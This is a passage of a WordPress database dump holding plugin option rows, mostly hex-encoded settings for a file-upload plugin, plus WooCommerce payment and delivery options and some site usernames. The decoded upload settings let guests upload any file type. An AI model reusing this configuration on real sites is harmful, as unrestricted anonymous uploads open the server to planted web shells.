11:36:18','yes'),(63274,'wordpress_file_upload_table_log_version','4.0','yes'),(63275,'wordpress_file_upload_table_userdata_version','1.0','yes'),(63276,'wordpress_file_upload_table_dbxqueue_version','1.0','yes'),(63277,'widget_wordpress_file_upload_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(63278,'wordpress_file_upload_last_idlog','a:3:{s:3:\"pre\";s:1:\"4\";s:4:\"post\";s:1:\"4\";s:4:\"time\";i:1647331740;}','yes'),(63286,'wfu_userstate_list','7b22706f37623177796464706a737a77687966386b6d3134326e6d3679746d6c796a223a313636373336333432367d','yes'),(63289,'wfu_userstate_list_last_check','31363637333633343236','yes'),(63429,'wfu_params_index','wHt3LP8g3Ms8t8E8||1204||1||sitemanager&&yC5HHycfDqHXQXQg||1254||1||sitemanager&&DrpndsZ1TqdqhH2A||1204||1||nijo101196&&r6n4gLY8EMQxZmSQ||1204||1||rakshithasj1999&&PZPHf2OApXCt47as||1204||1||utfhr.333&&MxxgrFEGbRFnNaCy||1204||1||xyzabc9980','yes'),(63430,'wfu_params_wHt3LP8g3Ms8t8E8','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f7469667968656164657273223a22222c226e6f746966797375626a656374223a2246696c652055706c6f6164204e6f74696669636174696f6e222c226e6f746966796d657373616765223a224465617220526563697069656e742c256e25256e252020205468697320697320616e206175746f6d617469632064656c6976657279206d65737361676520746f206e6f7469667920796f7520746861742061206e65772066696c6520686173206265656e2075706c6f616465642e256e25256e25426573742052656761726473222c2261747461636866696c65223a2266616c7365222c2261736b636f6e73656e74223a2266616c7365222c22706572736f6e616c646174617479706573223a227573657264617461222c226e6f7472656d656d626572636f6e73656e74223a2266616c7365222c22636f6e73656e7472656a65637475706c6f6164223a2266616c7365222c22636f6e73656e7472656a6563746d657373616765223a22596f7520686176652064656e69656420746f206c6574207468652077656273697465206b65657020796f757220706572736f6e616c20646174612e2055706c6f61642063616e6e6f7420636f6e74696e756521222c22636f6e73656e74666f726d6174223a22726164696f222c22636f6e73656e7470726573656c656374223a226e6f6e65222c22636f6e73656e747175657374696f6e223a2242792061637469766174696e672074686973206f7074696f6e204920616772656520746f206c6574207468652077656273697465206b656570206d7920706572736f6e616c2064617461222c22636f6e73656e74646973636c61696d6572223a22222c22737563636573736d657373616765636f6c6f72223a226565222c22737563636573736d657373616765636f6c6f7273223a22233030363630302c234545464645452c23303036363636222c227761726e696e676d657373616765636f6c6f7273223a22234638383031372c234645463245372c23363333333039222c226661696c6d657373616765636f6c6f7273223a22233636303030302c234646454545452c23363636363030222c22776169746d657373616765636f6c6f7273223a22233636363636362c234545454545452c23333333333333222c22776964746873223a22222c2268656967687473223a22222c227573657264617461223a2266616c7365222c2275736572646174616c6162656c223a22596f7572206d6573736167657c743a746578747c733a6c6566747c723a307c613a307c703a696e6c696e657c643a222c2266696c65626173656c696e6b223a2266616c7365222c226d656469616c696e6b223a2266616c7365222c22706f73746c696e6b223a2266616c7365222c2277656263616d223a2266616c7365222c2277656263616d6d6f6465223a226361707475726520766964656f222c22617564696f63617074757265223a2266616c7365222c22766964656f7769647468223a22222c22766964656f686569676874223a22222c22766964656f617370656374726174696f223a22222c22766964656f6672616d6572617465223a22222c2263616d657261666163696e67223a22616e79222c226d61787265636f726474696d65223a223130222c22706167656964223a313230342c22626c6f676964223a312c227068705f656e76223a223634626974222c2261646d696e6572726f7273223a22222c2275736572646174615f6669656c6473223a5b5d2c22737562666f6c646572736172726179223a5b5d2c227375626469725f73656c656374696f6e5f696e646578223a222d31227d','yes'),(63468,'wfu_params_yC5HHycfDqHXQXQg','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f7469667968656164657273223a22222c226e6f746966797375626a656374223a2246696c652055706c6f6164204e6f74696669636174696f6e222c226e6f746966796d657373616765223a224465617220526563697069656e742c256e25256e252020205468697320697320616e206175746f6d617469632064656c6976657279206d65737361676520746f206e6f7469667920796f7520746861742061206e65772066696c6520686173206265656e2075706c6f616465642e256e25256e25426573742052656761726473222c2261747461636866696c65223a2266616c7365222c2261736b636f6e73656e74223a2266616c7365222c22706572736f6e616c646174617479706573223a227573657264617461222c226e6f7472656d656d626572636f6e73656e74223a2266616c7365222c22636f6e73656e7472656a65637475706c6f6164223a2266616c7365222c22636f6e73656e7472656a6563746d657373616765223a22596f7520686176652064656e69656420746f206c6574207468652077656273697465206b65657020796f757220706572736f6e616c20646174612e2055706c6f61642063616e6e6f7420636f6e74696e756521222c22636f6e73656e74666f726d6174223a22726164696f222c22636f6e73656e7470726573656c656374223a226e6f6e65222c22636f6e73656e747175657374696f6e223a2242792061637469766174696e672074686973206f7074696f6e204920616772656520746f206c6574207468652077656273697465206b656570206d7920706572736f6e616c2064617461222c22636f6e73656e74646973636c61696d6572223a22222c22737563636573736d657373616765636f6c6f72223a226565222c22737563636573736d657373616765636f6c6f7273223a22233030363630302c234545464645452c23303036363636222c227761726e696e676d657373616765636f6c6f7273223a22234638383031372c234645463245372c23363333333039222c226661696c6d657373616765636f6c6f7273223a22233636303030302c234646454545452c23363636363030222c22776169746d657373616765636f6c6f7273223a22233636363636362c234545454545452c23333333333333222c22776964746873223a22222c2268656967687473223a22222c227573657264617461223a2266616c7365222c2275736572646174616c6162656c223a22596f7572206d6573736167657c743a746578747c733a6c6566747c723a307c613a307c703a696e6c696e657c643a222c2266696c65626173656c696e6b223a2266616c7365222c226d656469616c696e6b223a2266616c7365222c22706f73746c696e6b223a2266616c7365222c2277656263616d223a2266616c7365222c2277656263616d6d6f6465223a226361707475726520766964656f222c22617564696f63617074757265223a2266616c7365222c22766964656f7769647468223a22222c22766964656f686569676874223a22222c22766964656f617370656374726174696f223a22222c22766964656f6672616d6572617465223a22222c2263616d657261666163696e67223a22616e79222c226d61787265636f726474696d65223a223130222c22706167656964223a313235342c22626c6f676964223a312c227068705f656e76223a223634626974222c2261646d696e6572726f7273223a22222c2275736572646174615f6669656c6473223a5b5d2c22737562666f6c646572736172726179223a5b5d2c227375626469725f73656c656374696f6e5f696e646578223a222d31227d','yes'),(63508,'wfu_queue_RzfeNgCotG_count','2','yes'),(63886,'wfu_params_DrpndsZ1TqdqhH2A','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f7469667968656164657273223a22222c226e6f746966797375626a656374223a2246696c652055706c6f6164204e6f74696669636174696f6e222c226e6f746966796d657373616765223a224465617220526563697069656e742c256e25256e252020205468697320697320616e206175746f6d617469632064656c6976657279206d65737361676520746f206e6f7469667920796f7520746861742061206e65772066696c6520686173206265656e2075706c6f616465642e256e25256e25426573742052656761726473222c2261747461636866696c65223a2266616c7365222c2261736b636f6e73656e74223a2266616c7365222c22706572736f6e616c646174617479706573223a227573657264617461222c226e6f7472656d656d626572636f6e73656e74223a2266616c7365222c22636f6e73656e7472656a65637475706c6f6164223a2266616c7365222c22636f6e73656e7472656a6563746d657373616765223a22596f7520686176652064656e69656420746f206c6574207468652077656273697465206b65657020796f757220706572736f6e616c20646174612e2055706c6f61642063616e6e6f7420636f6e74696e756521222c22636f6e73656e74666f726d6174223a22726164696f222c22636f6e73656e7470726573656c656374223a226e6f6e65222c22636f6e73656e747175657374696f6e223a2242792061637469766174696e672074686973206f7074696f6e204920616772656520746f206c6574207468652077656273697465206b656570206d7920706572736f6e616c2064617461222c22636f6e73656e74646973636c61696d6572223a22222c22737563636573736d657373616765636f6c6f72223a226565222c22737563636573736d657373616765636f6c6f7273223a22233030363630302c234545464645452c23303036363636222c227761726e696e676d657373616765636f6c6f7273223a22234638383031372c234645463245372c23363333333039222c226661696c6d657373616765636f6c6f7273223a22233636303030302c234646454545452c23363636363030222c22776169746d657373616765636f6c6f7273223a22233636363636362c234545454545452c23333333333333222c22776964746873223a22222c2268656967687473223a22222c227573657264617461223a2266616c7365222c2275736572646174616c6162656c223a22596f7572206d6573736167657c743a746578747c733a6c6566747c723a307c613a307c703a696e6c696e657c643a222c2266696c65626173656c696e6b223a2266616c7365222c226d656469616c696e6b223a2266616c7365222c22706f73746c696e6b223a2266616c7365222c2277656263616d223a2266616c7365222c2277656263616d6d6f6465223a226361707475726520766964656f222c22617564696f63617074757265223a2266616c7365222c22766964656f7769647468223a22222c22766964656f686569676874223a22222c22766964656f617370656374726174696f223a22222c22766964656f6672616d6572617465223a22222c2263616d657261666163696e67223a22616e79222c226d61787265636f726474696d65223a223130222c22706167656964223a313230342c22626c6f676964223a312c227068705f656e76223a223634626974222c2261646d696e6572726f7273223a22222c2275736572646174615f6669656c6473223a5b5d2c22737562666f6c646572736172726179223a5b5d2c227375626469725f73656c656374696f6e5f696e646578223a222d31227d','yes'),(63919,'wfu_queue_yeE9v1xkBs_count','2','yes'),(65545,'yith_system_info','a:2:{s:11:\"system_info\";a:13:{s:14:\"min_wp_version\";a:1:{s:5:\"value\";s:5:\"5.9.1\";}s:14:\"min_wc_version\";a:1:{s:5:\"value\";s:5:\"6.2.1\";}s:15:\"wp_memory_limit\";a:1:{s:5:\"value\";i:2684354560;}s:15:\"min_php_version\";a:1:{s:5:\"value\";s:6:\"7.4.27\";}s:15:\"min_tls_version\";a:1:{s:5:\"value\";s:3:\"1.3\";}s:15:\"imagick_version\";a:1:{s:5:\"value\";s:5:\"6.9.7\";}s:15:\"wp_cron_enabled\";a:1:{s:5:\"value\";b:1;}s:16:\"mbstring_enabled\";a:1:{s:5:\"value\";b:1;}s:17:\"simplexml_enabled\";a:1:{s:5:\"value\";b:1;}s:10:\"gd_enabled\";a:1:{s:5:\"value\";b:1;}s:13:\"iconv_enabled\";a:1:{s:5:\"value\";b:1;}s:15:\"opcache_enabled\";a:1:{s:5:\"value\";s:1:\"1\";}s:17:\"url_fopen_enabled\";a:1:{s:5:\"value\";s:1:\"1\";}}s:6:\"errors\";b:0;}','yes'),(66576,'wfu_params_r6n4gLY8EMQxZmSQ','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f7469667968656164657273223a22222c226e6f746966797375626a656374223a2246696c652055706c6f6164204e6f74696669636174696f6e222c226e6f746966796d657373616765223a224465617220526563697069656e742c256e25256e252020205468697320697320616e206175746f6d617469632064656c6976657279206d65737361676520746f206e6f7469667920796f7520746861742061206e65772066696c6520686173206265656e2075706c6f616465642e256e25256e25426573742052656761726473222c2261747461636866696c65223a2266616c7365222c2261736b636f6e73656e74223a2266616c7365222c22706572736f6e616c646174617479706573223a227573657264617461222c226e6f7472656d656d626572636f6e73656e74223a2266616c7365222c22636f6e73656e7472656a65637475706c6f6164223a2266616c7365222c22636f6e73656e7472656a6563746d657373616765223a22596f7520686176652064656e69656420746f206c6574207468652077656273697465206b65657020796f757220706572736f6e616c20646174612e2055706c6f61642063616e6e6f7420636f6e74696e756521222c22636f6e73656e74666f726d6174223a22726164696f222c22636f6e73656e7470726573656c656374223a226e6f6e65222c22636f6e73656e747175657374696f6e223a2242792061637469766174696e672074686973206f7074696f6e204920616772656520746f206c6574207468652077656273697465206b656570206d7920706572736f6e616c2064617461222c22636f6e73656e74646973636c61696d6572223a22222c22737563636573736d657373616765636f6c6f72223a226565222c22737563636573736d657373616765636f6c6f7273223a22233030363630302c234545464645452c23303036363636222c227761726e696e676d657373616765636f6c6f7273223a22234638383031372c234645463245372c23363333333039222c226661696c6d657373616765636f6c6f7273223a22233636303030302c234646454545452c23363636363030222c22776169746d657373616765636f6c6f7273223a22233636363636362c234545454545452c23333333333333222c22776964746873223a22222c2268656967687473223a22222c227573657264617461223a2266616c7365222c2275736572646174616c6162656c223a22596f7572206d6573736167657c743a746578747c733a6c6566747c723a307c613a307c703a696e6c696e657c643a222c2266696c65626173656c696e6b223a2266616c7365222c226d656469616c696e6b223a2266616c7365222c22706f73746c696e6b223a2266616c7365222c2277656263616d223a2266616c7365222c2277656263616d6d6f6465223a226361707475726520766964656f222c22617564696f63617074757265223a2266616c7365222c22766964656f7769647468223a22222c22766964656f686569676874223a22222c22766964656f617370656374726174696f223a22222c22766964656f6672616d6572617465223a22222c2263616d657261666163696e67223a22616e79222c226d61787265636f726474696d65223a223130222c22706167656964223a313230342c22626c6f676964223a312c227068705f656e76223a223634626974222c2261646d696e6572726f7273223a22222c2275736572646174615f6669656c6473223a5b5d2c22737562666f6c646572736172726179223a5b5d2c227375626469725f73656c656374696f6e5f696e646578223a222d31227d','yes'),(66622,'wfu_queue_tpTiqVakms_count','2','yes'),(67566,'_transient_wcfm-notification-enquiry-28','0','yes'),(67727,'woocommerce_cod_settings','a:6:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:16:\"Cash on delivery\";s:11:\"description\";s:28:\"Pay with cash upon delivery.\";s:12:\"instructions\";s:28:\"Pay with cash upon delivery.\";s:18:\"enable_for_methods\";a:0:{}s:18:\"enable_for_virtual\";s:3:\"yes\";}','yes'),(67730,'woocommerce_gateway_order','a:4:{s:4:\"bacs\";i:0;s:6:\"cheque\";i:1;s:3:\"cod\";i:2;s:8:\"razorpay\";i:3;}','yes'),(67865,'_transient_wcfm-notification-enquiry-25','0','yes'),(68128,'wfu_params_PZPHf2OApXCt47as','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f7469667968656164657273223a22222c226e6f746966797375626a656374223a2246696c652055706c6f6164204e6f74696669636174696f6e222c226e6f746966796d657373616765223a224465617220526563697069656e742c256e25256e252020205468697320697320616e206175746f6d617469632064656c6976657279206d65737361676520746f206e6f7469667920796f7520746861742061206e65772066696c6520686173206265656e2075706c6f616465642e256e25256e25426573742052656761726473222c2261747461636866696c65223a2266616c7365222c2261736b636f6e73656e74223a2266616c7365222c22706572736f6e616c646174617479706573223a227573657264617461222c226e6f7472656d656d626572636f6e73656e74223a2266616c7365222c22636f6e73656e7472656a65637475706c6f6164223a2266616c7365222c22636f6e73656e7472656a6563746d657373616765223a22596f7520686176652064656e69656420746f206c6574207468652077656273697465206b65657020796f757220706572736f6e616c20646174612e2055706c6f61642063616e6e6f7420636f6e74696e756521222c22636f6e73656e74666f726d6174223a22726164696f222c22636f6e73656e7470726573656c656374223a226e6f6e65222c22636f6e73656e747175657374696f6e223a2242792061637469766174696e672074686973206f7074696f6e204920616772656520746f206c6574207468652077656273697465206b656570206d7920706572736f6e616c2064617461222c22636f6e73656e74646973636c61696d6572223a22222c22737563636573736d657373616765636f6c6f72223a226565222c22737563636573736d657373616765636f6c6f7273223a22233030363630302c234545464645452c23303036363636222c227761726e696e676d657373616765636f6c6f7273223a22234638383031372c234645463245372c23363333333039222c226661696c6d657373616765636f6c6f7273223a22233636303030302c234646454545452c23363636363030222c22776169746d657373616765636f6c6f7273223a22233636363636362c234545454545452c23333333333333222c22776964746873223a22222c2268656967687473223a22222c227573657264617461223a2266616c7365222c2275736572646174616c6162656c223a22596f7572206d6573736167657c743a746578747c733a6c6566747c723a307c613a307c703a696e6c696e657c643a222c2266696c65626173656c696e6b223a2266616c7365222c226d656469616c696e6b223a2266616c7365222c22706f73746c696e6b223a2266616c7365222c2277656263616d223a2266616c7365222c2277656263616d6d6f6465223a226361707475726520766964656f222c22617564696f63617074757265223a2266616c7365222c22766964656f7769647468223a22222c22766964656f686569676874223a22222c22766964656f617370656374726174696f223a22222c22766964656f6672616d6572617465223a22222c2263616d657261666163696e67223a22616e79222c226d61787265636f726474696d65223a223130222c22706167656964223a313230342c22626c6f676964223a312c227068705f656e76223a223634626974222c2261646d696e6572726f7273223a22222c2275736572646174615f6669656c6473223a5b5d2c22737562666f6c646572736172726179223a5b5d2c227375626469725f73656c656374696f6e5f696e646578223a222d31227d','yes'),(68158,'wfu_queue_OlvraeNXAZ_count','2','yes'),(68320,'plugin_activation_estimated-delivery-for-woocommerce/estimated-delivery-woocommerce.php','2022-03-15 14:00:25','yes'),(68332,'_transient_wcfm-notification-message-25','15','yes'),(68619,'_edw_disabled_days','a:0:{}','yes'),(68620,'_edw_position','woocommerce_after_add_to_cart_button','yes'),(68621,'_edw_max_days','','yes'),(68622,'_edw_days','','yes'),(68623,'_edw_mode','1','yes'),(68624,'_edw_days_outstock','','yes'),(68625,'_edw_max_days_outstock','','yes'),(68626,'_edw_days_backorders','','yes'),(68627,'_edw_max_days_backorders','','yes'),(68628,'_edw_relative_dates','0','yes'),(68629,'_edw_cache','0','yes'),(68920,'wfu_params_MxxgrFEGbRFnNaCy','7b227769646765746964223a22222c2275706c6f61646964223a2231222c2273696e676c65627574746f6e223a2266616c7365222c2275706c6f616470617468223a2275706c6f616473222c226669746d6f6465223a226669786564222c22616c6c6f776e6f66696c65223a2266616c7365222c2272657365746d6f6465223a22616c77617973222c2275706c6f6164726f6c65223a22616c6c2c677565737473222c2275706c6f61647061747465726e73223a222a2e2a222c226d617873697a65223a223530222c2263726561746570617468223a2266616c7365222c22666f72636566696c656e616d65223a2266616c7365222c226163636573736d6574686f64223a226e6f726d616c222c22667470696e666f223a22222c22757365667470646f6d61696e223a2266616c7365222c22667470706173736976656d6f6465223a2266616c7365222c2266747066696c657065726d697373696f6e73223a22222c2273686f77746172676574666f6c646572223a2266616c7365222c2261736b666f72737562666f6c64657273223a2266616c7365222c22737562666f6c64657274726565223a22222c226475706c696361746573706f6c696379223a226f7665727772697465222c22756e697175657061747465726e223a22696e646578222c227265646972656374223a2266616c7365222c2272656469726563746c696e6b223a22222c2261646d696e6d65737361676573223a66616c73652c22666f726365636c6173736963223a2266616c7365222c22746573746d6f6465223a2266616c7365222c2264656275676d6f6465223a2266616c7365222c22706c6163656d656e7473223a227469746c655c2f66696c656e616d652b73656c656374627574746f6e2b75706c6f6164627574746f6e5c2f737562666f6c646572735c2f75736572646174615c2f6d657373616765222c2275706c6f61647469746c65223a2255706c6f61642066696c6573222c2273656c656374627574746f6e223a2253656c6563742046696c65222c2275706c6f6164627574746f6e223a2255706c6f61642046696c65222c22746172676574666f6c6465726c6162656c223a2255706c6f6164204469726563746f7279222c22737562666f6c6465726c6162656c223a2253656c65637420537562666f6c646572222c22737563636573736d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79222c227761726e696e676d657373616765223a2246696c65202566696c656e616d65252075706c6f61646564207375636365737366756c6c79206275742077697468207761726e696e6773222c226572726f726d657373616765223a2246696c65202566696c656e616d6525206e6f742075706c6f61646564222c22776169746d657373616765223a2246696c65202566696c656e616d6525206973206265696e672075706c6f61646564222c2275706c6f61646d65646961627574746f6e223a2255706c6f6164204d65646961222c22766964656f6e616d65223a22766964656f73747265616d222c22696d6167656e616d65223a2273637265656e73686f74222c2272657175697265646c6162656c223a2228726571756972656429222c226e6f74696679223a2266616c7365222c226e6f74696679726563697069656e7473223a22222c226e6f74696